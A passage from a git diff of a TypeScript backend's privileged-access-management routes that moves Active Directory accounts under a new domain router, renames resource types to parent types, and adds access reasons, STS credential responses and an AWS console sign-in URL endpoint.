updatedAt: z.date() }) + ), + totalStaleCount: z.number() + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const { projectId, staleSecretsOffset, staleSecretsLimit } = req.query; + const result = await server.services.insights.getSummary( + { projectId, staleSecretsOffset, staleSecretsLimit }, + req.permission + ); + await server.services.auditLog.createAuditLog({ + projectId, + event: { type: EventType.VIEW_INSIGHTS_SECRETS_MANAGEMENT_SUMMARY, metadata: { projectId } }, + ...req.auditLogInfo + }); + return result; + } + }); +}; diff --git a/backend/src/ee/routes/v1/pam-account-routers/index.ts b/backend/src/ee/routes/v1/pam-account-routers/index.ts index 3f9eb4e1f45..d421df50a0c 100644 --- a/backend/src/ee/routes/v1/pam-account-routers/index.ts +++ b/backend/src/ee/routes/v1/pam-account-routers/index.ts @@ -1,8 +1,3 @@ -import { - CreateActiveDirectoryAccountSchema, - SanitizedActiveDirectoryAccountWithResourceSchema, - UpdateActiveDirectoryAccountSchema -} from "@app/ee/services/pam-resource/active-directory/active-directory-resource-schemas"; import { CreateAwsIamAccountSchema, SanitizedAwsIamAccountWithResourceSchema, @@ -56,7 +51,7 @@ export const PAM_ACCOUNT_REGISTER_ROUTER_MAP: Record { registerPamAccountEndpoints({ server, - resourceType: PamResource.Postgres, + parentType: PamResource.Postgres, accountResponseSchema: SanitizedPostgresAccountWithResourceSchema, createAccountSchema: CreatePostgresAccountSchema, updateAccountSchema: UpdatePostgresAccountSchema @@ -65,7 +60,7 @@ export const PAM_ACCOUNT_REGISTER_ROUTER_MAP: Record { registerPamAccountEndpoints({ server, - resourceType: PamResource.MySQL, + parentType: PamResource.MySQL, accountResponseSchema: SanitizedMySQLAccountWithResourceSchema, createAccountSchema: CreateMySQLAccountSchema, updateAccountSchema: UpdateMySQLAccountSchema @@ -74,7 +69,7 @@ export const PAM_ACCOUNT_REGISTER_ROUTER_MAP: Record { registerPamAccountEndpoints({ server, - resourceType: PamResource.MsSQL, + parentType: PamResource.MsSQL, accountResponseSchema: SanitizedMsSQLAccountWithResourceSchema, createAccountSchema: CreateMsSQLAccountSchema, updateAccountSchema: UpdateMsSQLAccountSchema @@ -83,7 +78,7 @@ export const PAM_ACCOUNT_REGISTER_ROUTER_MAP: Record { registerPamAccountEndpoints({ server, - resourceType: PamResource.Redis, + parentType: PamResource.Redis, accountResponseSchema: SanitizedRedisAccountWithResourceSchema, createAccountSchema: CreateRedisAccountSchema, updateAccountSchema: UpdateRedisAccountSchema @@ -92,7 +87,7 @@ export const PAM_ACCOUNT_REGISTER_ROUTER_MAP: Record { registerPamAccountEndpoints({ server, - resourceType: PamResource.MongoDB, + parentType: PamResource.MongoDB, accountResponseSchema: SanitizedMongoDBAccountWithResourceSchema, createAccountSchema: CreateMongoDBAccountSchema, updateAccountSchema: UpdateMongoDBAccountSchema @@ -101,7 +96,7 @@ export const PAM_ACCOUNT_REGISTER_ROUTER_MAP: Record { registerPamAccountEndpoints({ server, - resourceType: PamResource.SSH, + parentType: PamResource.SSH, accountResponseSchema: SanitizedSSHAccountWithResourceSchema, createAccountSchema: CreateSSHAccountSchema, updateAccountSchema: UpdateSSHAccountSchema @@ -110,7 +105,7 @@ export const PAM_ACCOUNT_REGISTER_ROUTER_MAP: Record { registerPamAccountEndpoints({ server, - resourceType: PamResource.Kubernetes, + parentType: PamResource.Kubernetes, accountResponseSchema: SanitizedKubernetesAccountWithResourceSchema, createAccountSchema: CreateKubernetesAccountSchema, updateAccountSchema: UpdateKubernetesAccountSchema @@ -119,7 +114,7 @@ export const PAM_ACCOUNT_REGISTER_ROUTER_MAP: Record { registerPamAccountEndpoints({ server, - resourceType: PamResource.AwsIam, + parentType: PamResource.AwsIam, accountResponseSchema: SanitizedAwsIamAccountWithResourceSchema, createAccountSchema: CreateAwsIamAccountSchema, updateAccountSchema: UpdateAwsIamAccountSchema @@ -128,19 +123,10 @@ export const PAM_ACCOUNT_REGISTER_ROUTER_MAP: Record { registerPamAccountEndpoints({ server, - resourceType: PamResource.Windows, + parentType: PamResource.Windows, accountResponseSchema: SanitizedWindowsAccountWithResourceSchema, createAccountSchema: CreateWindowsAccountSchema, updateAccountSchema: UpdateWindowsAccountSchema }); - }, - [PamResource.ActiveDirectory]: async (server: FastifyZodProvider) => { - registerPamAccountEndpoints({ - server, - resourceType: PamResource.ActiveDirectory, - accountResponseSchema: SanitizedActiveDirectoryAccountWithResourceSchema, - createAccountSchema: CreateActiveDirectoryAccountSchema, - updateAccountSchema: UpdateActiveDirectoryAccountSchema - }); } }; diff --git a/backend/src/ee/routes/v1/pam-account-routers/pam-account-endpoints.ts b/backend/src/ee/routes/v1/pam-account-routers/pam-account-endpoints.ts index b78ae1a9418..2b444685f4e 100644 --- a/backend/src/ee/routes/v1/pam-account-routers/pam-account-endpoints.ts +++ b/backend/src/ee/routes/v1/pam-account-routers/pam-account-endpoints.ts @@ -1,7 +1,7 @@ import { z } from "zod"; import { EventType } from "@app/ee/services/audit-log/audit-log-types"; -import { PamResource } from "@app/ee/services/pam-resource/pam-resource-enums"; +import { PamParentType } from "@app/ee/services/pam-account/pam-account-enums"; import { TPamAccount } from "@app/ee/services/pam-resource/pam-resource-types"; import { writeLimit } from "@app/server/config/rateLimiter"; import { getTelemetryDistinctId } from "@app/server/lib/telemetry"; @@ -12,16 +12,17 @@ import { PostHogEventTypes } from "@app/services/telemetry/telemetry-types"; export const registerPamAccountEndpoints = ({ server, - resourceType, + parentType, createAccountSchema, updateAccountSchema, accountResponseSchema }: { server: FastifyZodProvider; - resourceType: PamResource; + parentType: PamParentType; createAccountSchema: z.ZodType<{ credentials: C["credentials"]; - resourceId: C["resourceId"]; + resourceId?: C["resourceId"]; + domainId?: C["domainId"]; folderId?: C["folderId"]; name: C["name"]; description?: C["description"]; @@ -41,9 +42,9 @@ export const registerPamAccountEndpoints = ({ }>; accountResponseSchema: z.ZodTypeAny; }) => { - // Convert resource type enum value to PascalCase for operation IDs + // Convert parent type enum value to PascalCase for operation IDs // e.g., "postgres" -> "Postgres", "aws-iam" -> "AwsIam" - const resourceTypeId = resourceType + const parentTypeId = parentType .split("-") .map((word) => word.charAt(0).toUpperCase() + word.slice(1)) .join(""); @@ -55,7 +56,7 @@ export const registerPamAccountEndpoints = ({ rateLimit: writeLimit }, schema: { - operationId: `create${resourceTypeId}PamAccount`, + operationId: `create${parentTypeId}PamAccount`, description: "Create PAM account", body: createAccountSchema, response: { @@ -66,7 +67,14 @@ export const registerPamAccountEndpoints = ({ }, onRequest: verifyAuth([AuthMode.JWT]), handler: async (req) => { - const account = await server.services.pamAccount.create(req.body, req.permission); + const account = await server.services.pamAccount.create( + { + ...req.body, + resourceId: req.body.resourceId ?? undefined, + domainId: req.body.domainId ?? undefined + }, + req.permission + ); await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, @@ -76,7 +84,8 @@ export const registerPamAccountEndpoints = ({ type: EventType.PAM_ACCOUNT_CREATE, metadata: { resourceId: req.body.resourceId, - resourceType, + domainId: req.body.domainId, + parentType, folderId: req.body.folderId, name: req.body.name, description: req.body.description, @@ -91,7 +100,7 @@ export const registerPamAccountEndpoints = ({ distinctId: getTelemetryDistinctId(req), organizationId: req.permission.orgId, properties: { - resourceType, + parentType, projectId: account.projectId } }) @@ -108,7 +117,7 @@ export const registerPamAccountEndpoints = ({ rateLimit: writeLimit }, schema: { - operationId: `update${resourceTypeId}PamAccount`, + operationId: `update${parentTypeId}PamAccount`, description: "Update PAM account", params: z.object({ accountId: z.string().uuid() @@ -139,7 +148,8 @@ export const registerPamAccountEndpoints = ({ metadata: { accountId: req.params.accountId, resourceId: account.resourceId, - resourceType, + domainId: account.domainId, + parentType, name: req.body.name, description: req.body.description, requireMfa: req.body.requireMfa @@ -158,7 +168,7 @@ export const registerPamAccountEndpoints = ({ rateLimit: writeLimit }, schema: { - operationId: `delete${resourceTypeId}PamAccount`, + operationId: `delete${parentTypeId}PamAccount`, description: "Delete PAM account", params: z.object({ accountId: z.string().uuid() @@ -183,7 +193,8 @@ export const registerPamAccountEndpoints = ({ accountId: req.params.accountId, accountName: account.name, resourceId: account.resourceId, - resourceType + domainId: account.domainId, + parentType } } }); @@ -194,7 +205,7 @@ export const registerPamAccountEndpoints = ({ distinctId: getTelemetryDistinctId(req), organizationId: req.permission.orgId, properties: { - resourceType, + parentType, projectId: account.projectId } }) diff --git a/backend/src/ee/routes/v1/pam-account-routers/pam-account-router.ts b/backend/src/ee/routes/v1/pam-account-routers/pam-account-router.ts index 2e4275c5504..d39ff1890b5 100644 --- a/backend/src/ee/routes/v1/pam-account-routers/pam-account-router.ts +++ b/backend/src/ee/routes/v1/pam-account-routers/pam-account-router.ts @@ -1,13 +1,14 @@ import type WebSocket from "ws"; import { z } from "zod"; -import { PamAccountDependenciesSchema } from "@app/db/schemas"; +import { PamAccountDependenciesSchema, PamDomainsSchema, PamResourcesSchema } from "@app/db/schemas"; import { AuditLogInfo, EventType, UserAgentType } from "@app/ee/services/audit-log/audit-log-types"; -import { PamAccountOrderBy, PamAccountView } from "@app/ee/services/pam-account/pam-account-enums"; +import { PamAccountOrderBy, PamAccountView, PamParentType } from "@app/ee/services/pam-account/pam-account-enums"; import { ActiveDirectoryAccountCredentialsSchema, - SanitizedActiveDirectoryAccountWithResourceSchema -} from "@app/ee/services/pam-resource/active-directory/active-directory-resource-schemas"; + SanitizedActiveDirectoryAccountWithDomainSchema +} from "@app/ee/services/pam-domain/active-directory/active-directory-domain-schemas"; +import { PamDomainType } from "@app/ee/services/pam-domain/pam-domain-enums"; import { AwsIamAccountCredentialsSchema, SanitizedAwsIamAccountWithResourceSchema @@ -58,7 +59,7 @@ import { TokenType } from "@app/services/auth-token/auth-token-types"; import { PostHogEventTypes } from "@app/services/telemetry/telemetry-types"; const SanitizedAccountSchema = z - .discriminatedUnion("resourceType", [ + .discriminatedUnion("parentType", [ SanitizedKubernetesAccountWithResourceSchema, SanitizedSSHAccountWithResourceSchema, SanitizedPostgresAccountWithResourceSchema, @@ -68,7 +69,7 @@ const SanitizedAccountSchema = z SanitizedRedisAccountWithResourceSchema, SanitizedAwsIamAccountWithResourceSchema, SanitizedWindowsAccountWithResourceSchema, - SanitizedActiveDirectoryAccountWithResourceSchema + SanitizedActiveDirectoryAccountWithDomainSchema ]) .and( z.object({ @@ -85,49 +86,50 @@ const ListPamAccountsResponseSchema = z.object({ const AccountCredentialsBaseSchema = z.object({ accountId: z.string().uuid(), accountName: z.string(), - resourceName: z.string(), - projectId: z.string().uuid() + projectId: z.string().uuid(), + resource: PamResourcesSchema.pick({ id: true, name: true, resourceType: true }).nullable().optional(), + domain: PamDomainsSchema.pick({ id: true, name: true, domainType: true }).nullable().optional() }); -const AccountCredentialsResponseSchema = z.discriminatedUnion("resourceType", [ +const AccountCredentialsResponseSchema = z.discriminatedUnion("parentType", [ AccountCredentialsBaseSchema.extend({ - resourceType: z.literal(PamResource.Postgres), + parentType: z.literal(PamResource.Postgres), credentials: PostgresAccountCredentialsSchema }), AccountCredentialsBaseSchema.extend({ - resourceType: z.literal(PamResource.MySQL), + parentType: z.literal(PamResource.MySQL), credentials: MySQLAccountCredentialsSchema }), AccountCredentialsBaseSchema.extend({ - resourceType: z.literal(PamResource.MsSQL), + parentType: z.literal(PamResource.MsSQL), credentials: MsSQLAccountCredentialsSchema }), AccountCredentialsBaseSchema.extend({ - resourceType: z.literal(PamResource.MongoDB), + parentType: z.literal(PamResource.MongoDB), credentials: MongoDBAccountCredentialsSchema }), AccountCredentialsBaseSchema.extend({ - resourceType: z.literal(PamResource.SSH), - credentials: SSHAccountCredentialsSchema + parentType: z.literal(PamResource.Redis), + credentials: RedisAccountCredentialsSchema }), AccountCredentialsBaseSchema.extend({ - resourceType: z.literal(PamResource.Redis), - credentials: RedisAccountCredentialsSchema + parentType: z.literal(PamResource.SSH), + credentials: SSHAccountCredentialsSchema }), AccountCredentialsBaseSchema.extend({ - resourceType: z.literal(PamResource.Kubernetes), + parentType: z.literal(PamResource.Kubernetes), credentials: KubernetesAccountCredentialsSchema }), AccountCredentialsBaseSchema.extend({ - resourceType: z.literal(PamResource.AwsIam), + parentType: z.literal(PamResource.AwsIam), credentials: AwsIamAccountCredentialsSchema }), AccountCredentialsBaseSchema.extend({ - resourceType: z.literal(PamResource.Windows), + parentType: z.literal(PamResource.Windows), credentials: WindowsAccountCredentialsSchema }), AccountCredentialsBaseSchema.extend({ - resourceType: z.literal(PamResource.ActiveDirectory), + parentType: z.literal(PamDomainType.ActiveDirectory), credentials: ActiveDirectoryAccountCredentialsSchema }) ]); @@ -267,7 +269,7 @@ export const registerPamAccountRouter = async (server: FastifyZodProvider) => { distinctId: getTelemetryDistinctId(req), organizationId: req.permission.orgId, properties: { - resourceType: account.resourceType, + parentType: account.parentType as PamParentType, projectId: account.projectId } }) @@ -359,8 +361,10 @@ export const registerPamAccountRouter = async (server: FastifyZodProvider) => { metadata: { accountId: result.accountId, accountName: result.accountName, - resourceId: result.resourceId, - resourceType: result.resourceType + resourceId: result.resource?.id, + resourceType: result.resource?.resourceType, + domainId: result.domain?.id, + domainType: result.domain?.domainType } } }); @@ -451,6 +455,7 @@ export const registerPamAccountRouter = async (server: FastifyZodProvider) => { orderDirection: z.nativeEnum(OrderByDirection).default(OrderByDirection.ASC), search: z.string().trim().optional(), filterResourceIds: z.array(z.string().uuid()).optional(), + filterDomainIds: z.array(z.string().uuid()).optional(), metadata: z .array( z.object({ @@ -466,8 +471,18 @@ export const registerPamAccountRouter = async (server: FastifyZodProvider) => { }, onRequest: verifyAuth([AuthMode.JWT]), handler: async (req) => { - const { projectId, accountView, limit, offset, search, orderBy, orderDirection, filterResourceIds, metadata } = - req.body; + const { + projectId, + accountView, + limit, + offset, + search, + orderBy, + orderDirection, + filterResourceIds, + filterDomainIds, + metadata + } = req.body; const { accounts, totalCount } = await server.services.pamAccount.list({ actorId: req.permission.id, @@ -482,6 +497,7 @@ export const registerPamAccountRouter = async (server: FastifyZodProvider) => { orderBy, orderDirection, filterResourceIds, + filterDomainIds, metadataFilter: metadata }); @@ -514,6 +530,7 @@ export const registerPamAccountRouter = async (server: FastifyZodProvider) => { accountName: z.string().trim(), projectId: z.string().uuid(), mfaSessionId: z.string().optional(), + reason: z.string().trim().max(1000).optional(), duration: z .string() .min(1) @@ -540,11 +557,14 @@ export const registerPamAccountRouter = async (server: FastifyZodProvider) => { GatewayAccessResponseSchema.extend({ resourceType: z.literal(PamResource.Redis) }), GatewayAccessResponseSchema.extend({ resourceType: z.literal(PamResource.SSH) }), GatewayAccessResponseSchema.extend({ resourceType: z.literal(PamResource.Kubernetes) }), - // AWS IAM (no gateway, returns console URL) + // AWS IAM (no gateway, returns short-lived STS credentials usable by both CLI and console) z.object({ sessionId: z.string(), resourceType: z.literal(PamResource.AwsIam), - consoleUrl: z.string().url(), + accessKeyId: z.string(), + secretAccessKey: z.string(), + sessionToken: z.string(), + expiresAt: z.string(), metadata: z.record(z.string(), z.string().optional()).optional() }) ]) @@ -567,7 +587,8 @@ export const registerPamAccountRouter = async (server: FastifyZodProvider) => { accountName: req.body.accountName, projectId: req.body.projectId, duration: req.body.duration, - mfaSessionId: req.body.mfaSessionId + mfaSessionId: req.body.mfaSessionId, + reason: req.body.reason }, req.permission ); @@ -582,7 +603,8 @@ export const registerPamAccountRouter = async (server: FastifyZodProvider) => { accountId: response.account.id, resourceName: req.body.resourceName, accountName: response.account.name, - duration: req.body.duration ? new Date(req.body.duration).toISOString() : undefined + duration: req.body.duration ? new Date(req.body.duration).toISOString() : undefined, + reason: req.body.reason } } }); @@ -604,6 +626,66 @@ export const registerPamAccountRouter = async (server: FastifyZodProvider) => { } }); + // Mint an AWS Console federated sign-in URL from an existing AWS IAM session + server.route({ + method: "POST", + url: "/sessions/:sessionId/aws-console-url", + config: { + rateLimit: writeLimit + }, + schema: { + description: "Generate an AWS console sign-in URL for an existing PAM session", + params: z.object({ + sessionId: z.string().uuid() + }), + body: z.object({ + projectId: z.string().uuid(), + accessKeyId: z.string().min(1), + secretAccessKey: z.string().min(1), + sessionToken: z.string().min(1) + }), + response: { + 200: z.object({ + consoleUrl: z.string().url() + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + if (req.auth.authMode !== AuthMode.JWT) { + throw new BadRequestError({ message: "You can only access PAM accounts using JWT auth tokens." }); + } + + const result = await server.services.pamAccount.getAwsIamConsoleUrl( + { + sessionId: req.params.sessionId, + projectId: req.body.projectId, + accessKeyId: req.body.accessKeyId, + secretAccessKey: req.body.secretAccessKey, + sessionToken: req.body.sessionToken + }, + req.permission + ); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + orgId: req.permission.orgId, + projectId: req.body.projectId, + event: { + type: EventType.PAM_ACCOUNT_AWS_CONSOLE_URL_GENERATED, + metadata: { + sessionId: req.params.sessionId, + accountId: result.accountId ?? "", + resourceName: result.resourceName, + accountName: result.accountName + } + } + }); + + return { consoleUrl: result.consoleUrl }; + } + }); + // Web access ticket endpoint server.route({ method: "POST", @@ -618,7 +700,8 @@ export const registerPamAccountRouter = async (server: FastifyZodProvider) => { }), body: z.object({ projectId: z.string().uuid(), - mfaSessionId: z.string().optional() + mfaSessionId: z.string().optional(), + reason: z.string().trim().max(1000).optional() }), response: { 200: z.object({ ticket: z.string() }) @@ -639,7 +722,8 @@ export const registerPamAccountRouter = async (server: FastifyZodProvider) => { actorEmail: req.auth.user.email ?? "", actorName: `${req.auth.user.firstName ?? ""} ${req.auth.user.lastName ?? ""}`.trim(), auditLogInfo: req.auditLogInfo, - mfaSessionId: req.body.mfaSessionId + mfaSessionId: req.body.mfaSessionId, + reason: req.body.reason }); await server.services.telemetry @@ -708,6 +792,7 @@ export const registerPamAccountRouter = async (server: FastifyZodProvider) => { accountName: z.string(), actorEmail: z.string(), actorName: z.string(), + reason: z.string().nullable().optional(), auditLogInfo: z.object({ ipAddress: z.string().optional(), userAgent: z.string().optional(), @@ -737,7 +822,8 @@ export const registerPamAccountRouter = async (server: FastifyZodProvider) => { auditLogInfo: payload.auditLogInfo as AuditLogInfo, userId, actorIp: req.realIp ?? "", - actorUserAgent: req.headers["user-agent"] ?? "" + actorUserAgent: req.headers["user-agent"] ?? "", + reason: payload.reason }); } catch (err) { logger.error(err, "WebSocket ticket validation failed"); diff --git a/backend/src/ee/routes/v1/pam-domain-routers/index.ts b/backend/src/ee/routes/v1/pam-domain-routers/index.ts new file mode 100644 index 00000000000..ab5f2eb4323 --- /dev/null +++ b/backend/src/ee/routes/v1/pam-domain-routers/index.ts @@ -0,0 +1,44 @@ +import { registerPamAccountEndpoints } from "@app/ee/routes/v1/pam-account-routers/pam-account-endpoints"; +import { + CreateActiveDirectoryAccountSchema, + SanitizedActiveDirectoryAccountWithDomainSchema, + UpdateActiveDirectoryAccountSchema +} from "@app/ee/services/pam-domain/active-directory/active-directory-domain-schemas"; +import { PamDomainType } from "@app/ee/services/pam-domain/pam-domain-enums"; +import { + CreateActiveDirectoryDomainSchema, + SanitizedActiveDirectoryDomainSchema, + UpdateActiveDirectoryDomainSchema +} from "@app/ee/services/pam-domain/pam-domain-schemas"; + +import { registerActiveDirectoryRelatedResourcesEndpoint, registerPamDomainEndpoints } from "./pam-domain-endpoints"; + +export { registerPamDomainRouter } from "./pam-domain-router"; + +export const PAM_DOMAIN_REGISTER_ROUTER_MAP: Record Promise> = { + [PamDomainType.ActiveDirectory]: async (server: FastifyZodProvider) => { + registerPamDomainEndpoints({ + server, + domainType: PamDomainType.ActiveDirectory, + domainResponseSchema: SanitizedActiveDirectoryDomainSchema, + createDomainSchema: CreateActiveDirectoryDomainSchema, + updateDomainSchema: UpdateActiveDirectoryDomainSchema + }); + registerActiveDirectoryRelatedResourcesEndpoint(server); + } +}; + +export const PAM_DOMAIN_ACCOUNT_REGISTER_ROUTER_MAP: Record< + PamDomainType, + (server: FastifyZodProvider) => Promise +> = { + [PamDomainType.ActiveDirectory]: async (server: FastifyZodProvider) => { + registerPamAccountEndpoints({ + server, + parentType: PamDomainType.ActiveDirectory, + accountResponseSchema: SanitizedActiveDirectoryAccountWithDomainSchema, + createAccountSchema: CreateActiveDirectoryAccountSchema, + updateAccountSchema: UpdateActiveDirectoryAccountSchema + }); + } +}; diff --git a/backend/src/ee/routes/v1/pam-domain-routers/pam-domain-endpoints.ts b/backend/src/ee/routes/v1/pam-domain-routers/pam-domain-endpoints.ts new file mode 100644 index 00000000000..54b6fbb61ce --- /dev/null +++ b/backend/src/ee/routes/v1/pam-domain-routers/pam-domain-endpoints.ts @@ -0,0 +1,220 @@ +import { z } from "zod"; + +import { EventType } from "@app/ee/services/audit-log/audit-log-types"; +import { PamDomainType } from "@app/ee/services/pam-domain/pam-domain-enums"; +import { TPamDomain } from "@app/ee/services/pam-domain/pam-domain-types"; +import { SanitizedWindowsResourceSchema } from "@app/ee/services/pam-resource/windows-server/windows-server-resource-schemas"; +import { readLimit, writeLimit } from "@app/server/config/rateLimiter"; +import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; +import { AuthMode } from "@app/services/auth/auth-type"; +import { ResourceMetadataNonEncryptionSchema } from "@app/services/resource-metadata/resource-metadata-schema"; + +export const registerPamDomainEndpoints = ({ + server, + domainType, + createDomainSchema, + updateDomainSchema, + domainResponseSchema +}: { + server: FastifyZodProvider; + domainType: PamDomainType; + createDomainSchema: z.ZodType<{ + projectId: T["projectId"]; + connectionDetails: T["connectionDetails"]; + gatewayId?: string; + name: T["name"]; + metadata?: z.input; + }>; + updateDomainSchema: z.ZodType<{ + connectionDetails?: T["connectionDetails"]; + gatewayId?: string; + name?: T["name"]; + metadata?: z.input; + }>; + domainResponseSchema: z.ZodTypeAny; +}) => { + const domainTypeId = domainType + .split("-") + .map((word) => word.charAt(0).toUpperCase() + word.slice(1)) + .join(""); + + server.route({ + method: "GET", + url: "/:domainId", + config: { rateLimit: readLimit }, + schema: { + operationId: `get${domainTypeId}PamDomain`, + description: `Get ${domainTypeId} PAM domain`, + params: z.object({ domainId: z.string().uuid() }), + response: { + 200: z.object({ + domain: domainResponseSchema + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const domain = await server.services.pamDomain.getById(req.params.domainId, domainType, req.permission); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + orgId: req.permission.orgId, + projectId: domain.projectId, + event: { + type: EventType.PAM_DOMAIN_GET, + metadata: { + domainId: domain.id, + domainType: domain.domainType, + name: domain.name + } + } + }); + + return { domain }; + } + }); + + server.route({ + method: "POST", + url: "/", + config: { rateLimit: writeLimit }, + schema: { + operationId: `create${domainTypeId}PamDomain`, + description: `Create ${domainTypeId} PAM domain`, + body: createDomainSchema, + response: { + 200: z.object({ + domain: domainResponseSchema + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const domain = await server.services.pamDomain.create( + { + ...req.body, + domainType + }, + req.permission + ); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + orgId: req.permission.orgId, + projectId: req.body.projectId, + event: { + type: EventType.PAM_DOMAIN_CREATE, + metadata: { + domainType, + ...(req.body.gatewayId && { gatewayId: req.body.gatewayId }), + name: req.body.name + } + } + }); + + return { domain }; + } + }); + + server.route({ + method: "PATCH", + url: "/:domainId", + config: { rateLimit: writeLimit }, + schema: { + operationId: `update${domainTypeId}PamDomain`, + description: `Update ${domainTypeId} PAM domain`, + params: z.object({ domainId: z.string().uuid() }), + body: updateDomainSchema, + response: { + 200: z.object({ + domain: domainResponseSchema + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const domain = await server.services.pamDomain.updateById( + { + ...req.body, + domainId: req.params.domainId + }, + req.permission + ); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + orgId: req.permission.orgId, + projectId: domain.projectId, + event: { + type: EventType.PAM_DOMAIN_UPDATE, + metadata: { + domainId: req.params.domainId, + domainType, + ...(req.body.gatewayId && { gatewayId: req.body.gatewayId }), + ...(req.body.name && { name: req.body.name }) + } + } + }); + + return { domain }; + } + }); + + server.route({ + method: "DELETE", + url: "/:domainId", + config: { rateLimit: writeLimit }, + schema: { + operationId: `delete${domainTypeId}PamDomain`, + description: `Delete ${domainTypeId} PAM domain`, + params: z.object({ domainId: z.string().uuid() }), + response: { + 200: z.object({ + domain: domainResponseSchema + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const domain = await server.services.pamDomain.deleteById(req.params.domainId, req.permission); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + orgId: req.permission.orgId, + projectId: domain.projectId, + event: { + type: EventType.PAM_DOMAIN_DELETE, + metadata: { + domainId: req.params.domainId, + domainType + } + } + }); + + return { domain }; + } + }); +}; + +export const registerActiveDirectoryRelatedResourcesEndpoint = (server: FastifyZodProvider) => { + server.route({ + method: "GET", + url: "/:domainId/related-resources", + config: { rateLimit: readLimit }, + schema: { + operationId: "listActiveDirectoryDomainRelatedResources", + description: "List resources related to an Active Directory domain", + params: z.object({ domainId: z.string().uuid() }), + response: { + 200: z.object({ + resources: SanitizedWindowsResourceSchema.array() + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const resources = await server.services.pamDomain.listRelatedResources(req.params.domainId, req.permission); + return { resources }; + } + }); +}; diff --git a/backend/src/ee/routes/v1/pam-domain-routers/pam-domain-router.ts b/backend/src/ee/routes/v1/pam-domain-routers/pam-domain-router.ts new file mode 100644 index 00000000000..f88eb9fc09a --- /dev/null +++ b/backend/src/ee/routes/v1/pam-domain-routers/pam-domain-router.ts @@ -0,0 +1,108 @@ +import { z } from "zod"; + +import { EventType } from "@app/ee/services/audit-log/audit-log-types"; +import { PamDomainOrderBy } from "@app/ee/services/pam-domain/pam-domain-enums"; +import { + ActiveDirectoryDomainListItemSchema, + SanitizedDomainSchema +} from "@app/ee/services/pam-domain/pam-domain-schemas"; +import { OrderByDirection } from "@app/lib/types"; +import { readLimit } from "@app/server/config/rateLimiter"; +import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; +import { AuthMode } from "@app/services/auth/auth-type"; + +const DomainOptionsSchema = z.discriminatedUnion("domain", [ActiveDirectoryDomainListItemSchema]); + +export const registerPamDomainRouter = async (server: FastifyZodProvider) => { + server.route({ + method: "GET", + url: "/options", + config: { + rateLimit: readLimit + }, + schema: { + operationId: "listPamDomainOptions", + description: "List available PAM domain types", + response: { + 200: z.object({ + options: DomainOptionsSchema.array() + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: () => { + const options = server.services.pamDomain.listDomainOptions(); + return { options }; + } + }); + + server.route({ + method: "GET", + url: "/", + config: { + rateLimit: readLimit + }, + schema: { + operationId: "listPamDomains", + description: "List PAM domains", + querystring: z.object({ + projectId: z.string().uuid(), + search: z.string().optional(), + limit: z.coerce.number().int().min(1).max(100).optional(), + offset: z.coerce.number().int().min(0).optional(), + orderBy: z.nativeEnum(PamDomainOrderBy).default(PamDomainOrderBy.Name), + orderDirection: z.nativeEnum(OrderByDirection).default(OrderByDirection.ASC), + filterDomainTypes: z + .string() + .transform((val) => + val + .split(",") + .map((s) => s.trim()) + .filter(Boolean) + ) + .optional(), + discoveryFingerprint: z.string().optional() + }), + response: { + 200: z.object({ + domains: SanitizedDomainSchema.array(), + totalCount: z.number() + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const { projectId, search, limit, offset, orderBy, orderDirection, filterDomainTypes, discoveryFingerprint } = + req.query; + + const { domains, totalCount } = await server.services.pamDomain.list({ + projectId, + search, + limit, + offset, + orderBy, + orderDirection, + filterDomainTypes, + actor: req.permission.type, + actorId: req.permission.id, + actorAuthMethod: req.permission.authMethod, + actorOrgId: req.permission.orgId, + discoveryFingerprint + }); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + orgId: req.permission.orgId, + projectId, + event: { + type: EventType.PAM_DOMAIN_LIST, + metadata: { + count: domains.length + } + } + }); + + return { domains, totalCount }; + } + }); +}; diff --git a/backend/src/ee/routes/v1/pam-resource-routers/index.ts b/backend/src/ee/routes/v1/pam-resource-routers/index.ts index 0fdc50ca5ce..ef58df57d7e 100644 --- a/backend/src/ee/routes/v1/pam-resource-routers/index.ts +++ b/backend/src/ee/routes/v1/pam-resource-routers/index.ts @@ -1,8 +1,3 @@ -import { - CreateActiveDirectoryResourceSchema, - SanitizedActiveDirectoryResourceSchema, - UpdateActiveDirectoryResourceSchema -} from "@app/ee/services/pam-resource/active-directory/active-directory-resource-schemas"; import { CreateAwsIamResourceSchema, SanitizedAwsIamResourceSchema, @@ -51,7 +46,6 @@ import { } from "@app/ee/services/pam-resource/windows-server/windows-server-resource-schemas"; import { - registerActiveDirectoryRelatedResourcesEndpoint, registerPamResourceEndpoints, registerSshCaPublicKeyEndpoint, registerSshCaSetupEndpoint @@ -140,15 +134,5 @@ export const PAM_RESOURCE_REGISTER_ROUTER_MAP: Record { - registerPamResourceEndpoints({ - server, - resourceType: PamResource.ActiveDirectory, - resourceResponseSchema: SanitizedActiveDirectoryResourceSchema, - createResourceSchema: CreateActiveDirectoryResourceSchema, - updateResourceSchema: UpdateActiveDirectoryResourceSchema - }); - registerActiveDirectoryRelatedResourcesEndpoint(server); } }; diff --git 